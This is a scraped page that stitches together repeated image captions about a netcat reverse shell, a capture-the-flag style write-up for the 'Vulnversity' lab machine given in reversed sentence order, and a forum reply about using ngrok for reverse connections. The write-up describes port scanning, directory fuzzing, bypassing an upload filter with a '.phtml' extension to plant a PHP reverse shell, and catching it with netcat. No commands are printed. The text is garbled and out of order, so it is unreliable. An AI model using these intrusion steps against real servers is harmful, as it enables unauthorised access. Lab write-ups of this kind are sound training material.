![netcat reverse shell not working getting hung up netcat reverse shell not working getting hung up](https://usermanual.wiki/Pdf/manual.980920320-User-Guide-Page-1.png)
Like who actually we are at the moment on the system and the users privileges.
![netcat reverse shell not working getting hung up netcat reverse shell not working getting hung up](https://i.ebayimg.com/images/g/sXkAAOSw42FgzT2E/s-l300.jpg)
This makes the machine connect to our computer using the PHP shell: Opening our file in the browser, executes it on the machine. Navigating to "/uploads/"reveals our uploaded shell! We look where have been our "Reverse Shell" has been uploaded. Similarly by testing the other extensions ".phtml" extensions was allowed. At first let's try uploading the traditional ".php" file.
![netcat reverse shell not working getting hung up netcat reverse shell not working getting hung up](https://i.ytimg.com/vi/YHc0ux4jf54/maxresdefault.jpg)
Its time to check which extension is not being sanitized properly. I renamed the file to "reverse.php" and make multiple copied of this file with multiple extensions (manually fuzzing which extension works). Now all we need is to upload the PHP reverse shell now. Listen to all incoming connections with the command shown below! Once done, it's time to start listening for the reverse connection using "NetCat". Secondly open up the reverse shell and edit both of the details. All you need is to do "ifconfig" and select the IP Address provided with the interface "tun0". The second thing is we need to edit the and for our reverse connection. Just copy the shell into any of your working directory! Webshells are pre-present in the Kali Linux and we will be using PHP shell. Most of the times it is possible to bypass the check. The first thing that is required to be checked with upload options is the "extension type". Opening the "/internal/" directory, provides us with the some upload functionality! You can use "dirb, dirbuster, wfuzz, gobuster" it all depends on your choice. There are different tools for this job as well. Now, we need to find the directories and any possible functionalities like "Upload" where we can upload the reverse shells etc. On opening the IP in browser we are presented with the web application. We can see that an "Apache Server" is running on port 3333. I personally scan the IP addresses in the following way. This can be achieved with a number of tools but nothing can be more better than an "NMAP Scan". The first thing that we are required to do is to look for open ports. Once connected to VPN, deploy the machine! Enumerating and Initial Access
#Netcat reverse shell not working getting hung up download
Download the access file from your profile and connect to it like. Let's dive into exploiting this machine and learn together on the go! Connect via OpenVPNįirst we need to connect via our VPN and need to deploy the machine. Gain access on the "System Level" by exploiting "Web Applications Vulnerabilities". Keep in mind this is a staged payload.Follow along with this writeup, and deploy your own instance of Vulnversity! This is a module from Rapid7 that should be used with their handler but you don't have to. This will work with any operating system on a server. I'm writing this on my phone and is a bit difficult to structure the text. Ask me if there is something that you dont understand. So if that other server (remote url) executes that php( you upload the file and open the url), you would need a public IP, because that server is on the internet and cannot find your physical ip. The file needs to be executed from the server that you want to conect to, so that the php in that system executes the bash command. So the php is being executed in your server, not in another site. If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080 So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip. So ngrok makes a localhost port public, like localhost:3000->, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.